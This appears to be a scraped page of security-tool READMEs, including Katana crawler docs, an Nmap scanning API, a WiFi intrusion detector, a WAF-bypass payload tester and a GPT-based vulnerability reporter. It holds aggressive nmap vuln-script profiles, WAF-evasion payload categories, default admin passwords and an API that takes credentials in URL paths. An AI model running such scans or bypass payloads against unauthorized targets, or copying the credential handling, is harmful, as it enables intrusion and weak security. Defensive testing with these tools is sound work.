    -fc, -form-config string path to custom form configuration file

    Filters

    -field

    Katana comes with built in fields that can be used to filter the output for the desired information, -f option can be used to specify any of the available fields.

       -f, -field string  field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,key,value,kv,dir,udir)

    Here is a table with examples of each field and expected output when used -

    FIELD DESCRIPTION EXAMPLE
    url URL Endpoint https://admin.projectdiscovery.io/admin/login?user=admin&password=admin
    qurl URL including query param https://admin.projectdiscovery.io/admin/login.php?user=admin&password=admin
    qpath Path including query param /login?user=admin&password=admin
    path URL Path https://admin.projectdiscovery.io/admin/login
    fqdn Fully Qualified Domain name admin.projectdiscovery.io
    rdn Root Domain name projectdiscovery.io
    rurl Root URL https://admin.projectdiscovery.io
    file Filename in URL login.php
    key Parameter keys in URL user,password
    value Parameter values in URL admin,admin
    kv Keys=Values in URL user=admin&password=admin
    dir URL Directory name /admin/
    udir URL with Directory https://admin.projectdiscovery.io/admin/

    Here is an example of using field option to only display all the urls with query parameter in it -

    katana -u https://tesla.com -f qurl -silent

    https://shop.tesla.com/en_au?redirect=no
    https://shop.tesla.com/en_nz?redirect=no
    https://shop.tesla.com/product/men_s-raven-lightweight-zip-up-bomber-jacket?sku=1740250-00-A
    https://shop.tesla.com/product/tesla-shop-gift-card?sku=1767247-00-A
    https://shop.tesla.com/product/men_s-chill-crew-neck-sweatshirt?sku=1740176-00-A
    https://www.tesla.com/about?redirect=no
    https://www.tesla.com/about/legal?redirect=no
    https://www.tesla.com/findus/list?redirect=no

    Custom Fields

    You can create custom fields to extract and store specific information from page responses using regex rules. These custom fields are defined using a YAML config file and are loaded from the default location at $HOME/.config/katana/field-config.yaml. Alternatively, you can use the -flc option to load a custom field config file from a different location. Here is example custom field.

    - name: email
    type: regex
    regex:
    - '([a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)'
    - '([a-zA-Z0-9+._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)'

    - name: phone
    type: regex
    regex:
    - '\d{3}-\d{8}|\d{4}-\d{7}'

    When defining custom fields, following attributes are supported:

    • name (required)

    The value of name attribute is used as the -field cli option value.

    • type (required)

    The type of custom attribute, currenly supported option - regex

    • part (optional)

    The part of the response to extract the information from. The default value is response, which includes both the header and body. Other possible values are header and body.

    • group (optional)

    You can use this attribute to select a specific matched group in regex, for example: group: 1

    Running katana using custom field:

    katana -u https://tesla.com -f email,phone

    -store-field

    To compliment field option which is useful to filter output at run time, there is -sf, -store-fields option which works exactly like field option except instead of filtering, it stores all the information on the disk under katana_field directory sorted by target url.

    katana -u https://tesla.com -sf key,fqdn,qurl -silent
    $ ls katana_field/

    https_www.tesla.com_fqdn.txt
    https_www.tesla.com_key.txt
    https_www.tesla.com_qurl.txt

    The -store-field option can be useful for collecting information to build a targeted wordlist for various purposes, including but not limited to:

    • Identifying the most commonly used parameters
    • Discovering frequently used paths
    • Finding commonly used files
    • Identifying related or unknown subdomains

    -extension-match

    Crawl output can be easily matched for specific extension using -em option to ensure to display only output containing given extension.

    katana -u https://tesla.com -silent -em js,jsp,json

    -extension-filter

    Crawl output can be easily filtered for specific extension using -ef option which ensure to remove all the urls containing given extension.

    katana -u https://tesla.com -silent -ef css,txt,md

    Here are additional filter options -

       -f, -field string                field to display in output (url,path,fqdn,rdn,rurl,qurl,file,key,value,kv,dir,udir)
    -sf, -store-field string field to store in per-host output (url,path,fqdn,rdn,rurl,qurl,file,key,value,kv,dir,udir)
    -em, -extension-match string[] match output for given extension (eg, -em php,html,js)
    -ef, -extension-filter string[] filter output for given extension (eg, -ef png,css)

    Rate Limit

    It's easy to get blocked / banned while crawling if not following target websites limits, katana comes with multiple option to tune the crawl to go as fast / slow we want.

    -delay

    option to introduce a delay in seconds between each new request katana makes while crawling, disabled as default.

    katana -u https://tesla.com -delay 20

    -concurrency

    option to control the number of urls per target to fetch at the same time.

    katana -u https://tesla.com -c 20

    -parallelism

    option to define number of target to process at same time from list input.

    katana -u https://tesla.com -p 20

    -rate-limit

    option to use to define max number of request can go out per second.

    katana -u https://tesla.com -rl 100

    -rate-limit-minute

    option to use to define max number of request can go out per minute.

    katana -u https://tesla.com -rlm 500

    Here is all long / short CLI options for rate limit control -

    katana -h rate-limit

    Flags:
    RATE-LIMIT:
    -c, -concurrency int number of concurrent fetchers to use (default 10)
    -p, -parallelism int number of concurrent inputs to process (default 10)
    -rd, -delay int request delay between each request in seconds
    -rl, -rate-limit int maximum requests to send per second (default 150)
    -rlm, -rate-limit-minute int maximum number of requests to send per minute

    Output

    Katana support both file output in plain text format as well as JSON which includes additional information like, source, tag, and attribute name to co-related the discovered endpoint.

    -output

    By default, katana outputs the crawled endpoints in plain text format. The results can be written to a file by using the -output option.

    katana -u https://example.com -no-scope -output example_endpoints.txt

    -json

    katana -u https://example.com -json -do | jq .
    {
    "timestamp": "2022-11-05T22:33:27.745815+05:30",
    "endpoint": "https://www.iana.org/domains/example",
    "source": "https://example.com",
    "tag": "a",
    "attribute": "href"
    }

    -store-response

    The -store-response option allows for writing all crawled endpoint requests and responses to a text file. When this option is used, text files including the request and response will be written to the katana_response directory. If you would like to specify a custom directory, you can use the -store-response-dir option.

    katana -u https://example.com -no-scope -store-response
    $ cat katana_response/index.txt

    katana_response/example.com/327c3fda87ce286848a574982ddd0b7c7487f816.txt https://example.com (200 OK)
    katana_response/www.iana.org/bfc096e6dd93b993ca8918bf4c08fdc707a70723.txt http://www.iana.org/domains/reserved (200 OK)

    Note:

    -store-response option is not supported in -headless mode.

    Here are additional CLI options related to output -

    katana -h output

    OUTPUT:
    -o, -output string file to write output to
    -sr, -store-response store http requests/responses
    -srd, -store-response-dir string store http requests/responses to custom directory
    -j, -json write output in JSONL(ines) format
    -nc, -no-color disable output content coloring (ANSI escape codes)
    -silent display output only
    -v, -verbose display verbose output
    -version display project version


    Nmap-API - Uses Python3.10, Debian, python-Nmap, And Flask Framework To Create A Nmap API That Can Do Scans With A Good Speed Online And Is Easy To Deploy


    Uses python3.10, Debian, python-Nmap, and flask framework to create a Nmap API that can do scans with a good speed online and is easy to deploy.

    This is a implementation for our college PCL project which is still under development and constantly updating.


    API Reference

    Get all items

      GET /api/p1/{username}:{password}/{target}
    GET /api/p2/{username}:{password}/{target}
    GET /api/p3/{username}:{password}/{target}
    GET /api/p4/{username}:{password}/{target}
    GET /api/p5/{username}:{password}/{target}
    Parameter Type Description
    username string Required. username of the current user
    password string Required. current user password
    target string Required. The target Hostname and IP

    Get item

      GET /api/p1/
    GET /api/p2/
    GET /api/p3/
    GET /api/p4/
    GET /api/p5/
    Parameter Return data Description Nmap Command
    p1 json Effective Scan -Pn -sV -T4 -O -F
    p2 json Simple Scan -Pn -T4 -A -v
    p3 json Low Power Scan -Pn -sS -sU -T4 -A -v
    p4 json Partial Intense Scan -Pn -p- -T4 -A -v
    p5 json Complete Intense Scan -Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln

    Auth and User management

      POST /adduser/{admin-username}:{admin-passwd}/{id}/{username}/{passwd}
    POST /deluser/{admin-username}:{admin-passwd}/{t-username}/{t-userpass}
    POST /altusername/{admin-username}:{admin-passwd}/{t-user-id}/{new-t-username}
    POST /altuserid/{admin-username}:{admin-passwd}/{new-t-user-id}/{t-username}
    POST /altpassword/{admin-username}:{admin-passwd}/{t-username}/{new-t-userpass}
    • make sure you use the ADMIN CREDS MENTIONED BELOW
    Parameter Type Description
    admin-username String Admin username
    admin-passwd String Admin password
    id String Id for newly added user
    username String Username of the newly added user
    passwd String Password of the newly added user
    t-username String Target username
    t-user-id String Target userID
    t-userpass String Target users password
    new-t-username String New username for the target
    new-t-user-id String New userID for the target
    new-t-userpass String New password for the target

    DEFAULT CREDENTIALS

    ADMINISTRATOR : zAp6_oO~t428)@,



    Pinacolada - Wireless Intrusion Detection System For Hak5's WiFi Coconut


    Pinacolada looks for typical IEEE 802.11 attacks and then informs you about them as quickly as possible. All this with the help of Hak5's WiFi Coconut, which allows it to listen for threats on all 14 channels in the 2.4GHz range simultaneously.


    Supported 802.11 Attacks

    Attack Type Status
    Deauthentication DoS
    Disassociation DoS
    Authentication DoS
    EvilTwin MiTM
    KARMA MiTM

    Dependencies

    MacOS (With PIP/Python and Homebrew package manager)

    pip install flask
    brew install wireshark

    Linux (With PIP/Python and APT package manager)

    pip install flask
    apt install tshark

    For both operating systems install the WiFi Coconut's userspace

    Installation

    # Download Pinacolada
    git clone https://github.com/90N45-d3v/Pinacolada
    cd Pinacolada

    # Start Pinacolada
    python main.py

    Usage

    Pinacolada will be accessible from your browser at 127.0.0.1:8888.
    The default password is CoconutsAreYummy.
    After you have logged in, you can see a dashboard on the start page and you should change the password in the settings tab.

    E-Mail Notifications

    If configured, Pinacolada will alert you to attacks via E-Mail. In order to send you an E-Mail, however, an E-Mail account for Pinacolada must be specified in the settings tab. To find the necessary information such as SMTP server and SMTP port, search the internet for your mail provider and how their SMTP servers are configured + how to use them. Here are some information about known providers:

    Provider SMTP Server SMTP Port (TLS)
    Gmail smtp.gmail.com 587
    Outlook smtp.office365.com 587
    GoDaddy smtpout.secureserver.net 587

    Not fully tested!

    Since I don't own a WiFi Coconut myself, I have to simulate their traffic. So if you encounter any problems, don't hesitate to contact me and open an issue.



    Waf-Bypass - Check Your WAF Before An Attacker Does


    WAF bypass Tool is an open source tool to analyze the security of any WAF for False Positives and False Negatives using predefined and customizable payloads. Check your WAF before an attacker does. WAF Bypass Tool is developed by Nemesida WAF team with the participation of community.


    How to run

    It is forbidden to use for illegal and illegal purposes. Don't break the law. We are not responsible for possible risks associated with the use of this software.

    Run from Docker

    The latest waf-bypass always available via the Docker Hub. It can be easily pulled via the following command:

    # docker pull nemesida/waf-bypass
    # docker run nemesida/waf-bypass --host='example.com'

    Run source code from GitHub

    # git clone https://github.com/nemesida-waf/waf_bypass.git /opt/waf-bypass/
    # python3 -m pip install -r /opt/waf-bypass/requirements.txt
    # python3 /opt/waf-bypass/main.py --host='example.com'

    Options

    • '--proxy' (--proxy='http://proxy.example.com:3128') - option allows to specify where to connect to instead of the host.

    • '--header' (--header 'Authorization: Basic YWRtaW46YWRtaW4=' --header 'X-TOKEN: ABCDEF') - option allows to specify the HTTP header to send with all requests (e.g. for authentication). Multiple use is allowed.

    • '--user-agent' (--user-agent 'MyUserAgent 1/1') - option allows to specify the HTTP User-Agent to send with all requests, except when the User-Agent is set by the payload ("USER-AGENT").

    • '--block-code' (--block-code='403' --block-code='222') - option allows you to specify the HTTP status code to expect when the WAF is blocked. (default is 403). Multiple use is allowed.

    • '--threads' (--threads=15) - option allows to specify the number of parallel scan threads (default is 10).

    • '--timeout' (--timeout=10) - option allows to specify a request processing timeout in sec. (default is 30).

    • '--json-format' - an option that allows you to display the result of the work in JSON format (useful for integrating the tool with security platforms).

    • '--details' - display the False Positive and False Negative payloads. Not available in JSON format.

    • '--exclude-dir' - exclude the payload's directory (--exclude-dir='SQLi' --exclude-dir='XSS'). Multiple use is allowed.

    Payloads

    Depending on the purpose, payloads are located in the appropriate folders:

    • FP - False Positive payloads
    • API - API testing payloads
    • CM - Custom HTTP Method payloads
    • GraphQL - GraphQL testing payloads
    • LDAP - LDAP Injection etc. payloads
    • LFI - Local File Include payloads
    • MFD - multipart/form-data payloads
    • NoSQLi - NoSQL injection payloads
    • OR - Open Redirect payloads
    • RCE - Remote Code Execution payloads
    • RFI - Remote File Inclusion payloads
    • SQLi - SQL injection payloads
    • SSI - Server-Side Includes payloads
    • SSRF - Server-side request forgery payloads
    • SSTI - Server-Side Template Injection payloads
    • UWA - Unwanted Access payloads
    • XSS - Cross-Site Scripting payloads

    Write your own payloads

    When compiling a payload, the following zones, method and options are used:

    • URL - request's path
    • ARGS - request's query
    • BODY - request's body
    • COOKIE - request's cookie
    • USER-AGENT - request's user-agent
    • REFERER - request's referer
    • HEADER - request's header
    • METHOD - request's method
    • BOUNDARY - specifies the contents of the request's boundary. Applicable only to payloads in the MFD directory.
    • ENCODE - specifies the type of payload encoding (Base64, HTML-ENTITY, UTF-16) in addition to the encoding for the payload. Multiple values are indicated with a space (e.g. Base64 UTF-16). Applicable only to for ARGS, BODY, COOKIE and HEADER zone. Not applicable to payloads in API and MFD directories. Not compatible with option JSON.
    • JSON - specifies that the request's body should be in JSON format
    • BLOCKED - specifies that the request should be blocked (FN testing) or not (FP)

    Except for some cases described below, the zones are independent of each other and are tested separately (those if 2 zones are specified - the script will send 2 requests - alternately checking one and the second zone).

    For the zones you can use %RND% suffix, which allows you to generate an arbitrary string of 6 letters and numbers. (e.g.: param%RND=my_payload or param=%RND% OR A%RND%B)

    You can create your own payloads, to do this, create your own folder on the '/payload/' folder, or place the payload in an existing one (e.g.: '/payload/XSS'). Allowed data format is JSON.

    API directory

    API testing payloads located in this directory are automatically appended with a header 'Content-Type: application/json'.

    MFD directory

    For MFD (multipart/form-data) payloads located in this directory, you must specify the BODY (required) and BOUNDARY (optional). If BOUNDARY is not set, it will be generated automatically (in this case, only the payload must be specified for the BODY, without additional data ('... Content-Disposition: form-data; ...').

    If a BOUNDARY is specified, then the content of the BODY must be formatted in accordance with the RFC, but this allows for multiple payloads in BODY a separated by BOUNDARY.

    Other zones are allowed in this directory (e.g.: URL, ARGS etc.). Regardless of the zone, header 'Content-Type: multipart/form-data; boundary=...' will be added to all requests.



    GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


    This is a Proof Of Concept application that demostrates how AI can be used to generate accurate results for vulnerability analysis and also allows further utilization of the already super useful ChatGPT.

    Requirements

    • Python 3.10
    • All the packages mentioned in the requirements.txt file
    • OpenAi api

    Usage

    • First Change the "API__KEY" part of the code with OpenAI api key
    openai.api_key = "__API__KEY" # Enter your API key
    • second install the packages
    pip3 install -r requirements.txt
    or
    pip install -r requirements.txt
    • run the code python3 gpt_vuln.py <> or if windows run python gpt_vuln.py <>

    Supported in both windows and linux

    Understanding the code

    Profiles:

    Parameter Return data Description Nmap Command
    p1 json Effective Scan -Pn -sV -T4 -O -F
    p2 json Simple Scan -Pn -T4 -A -v
    p3 json Low Power Scan -Pn -sS -sU -T4 -A -v
    p4 json Partial Intense Scan -Pn -p- -T4 -A -v
    p5 json Complete Intense Scan -Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln

    The profile is the type of scan that will be executed by the nmap subprocess. The Ip or target will be provided via argparse. At first the custom nmap scan is run which has all the curcial arguments for the scan to continue. nextly the scan data is extracted from the huge pile of data which has been driven by nmap. the "scan" object has a list of sub data under "tcp" each labled according to the ports opened. once the data is extracted the data is sent to openai API davenci model via a prompt. the prompt specifically asks for an JSON output and the data also to be used in a certain manner.

    The entire structure of request that has to be sent to the openai API is designed in the completion section of the Program.

    vulnerability analysis of {} and return a vulnerabilty report in json".format(analize) # A structure for the request completion = openai.Completion.create( engine=model_engine, prompt=prompt, max_tokens=1024, n=1, stop=None, ) response = completion.choices[0].text return response" dir="auto">
    def profile(ip):
    nm.scan('{}'.format(ip), arguments='-Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln')
    json_data = nm.analyse_nmap_xml_scan()
    analize = json_data["scan"]
    # Prompt about what the quary is all about
    prompt = "do a vulnerability analysis of {} and return a vulnerabilty report in json".format(analize)
    # A structure for the request
    completion = openai.Completion.create(
    engine=model_engine,
    prompt=prompt,
    max_tokens=1024,
    n=1,
    stop=None,
    )
    response = completion.choices[0].text
    return response

    Advantages

    • Can be used in developing a more advanced systems completly made of the API and scanner combination
    • Can increase the effectiveness of the final system
    • Highly productive when working with models such as GPT3


    ❌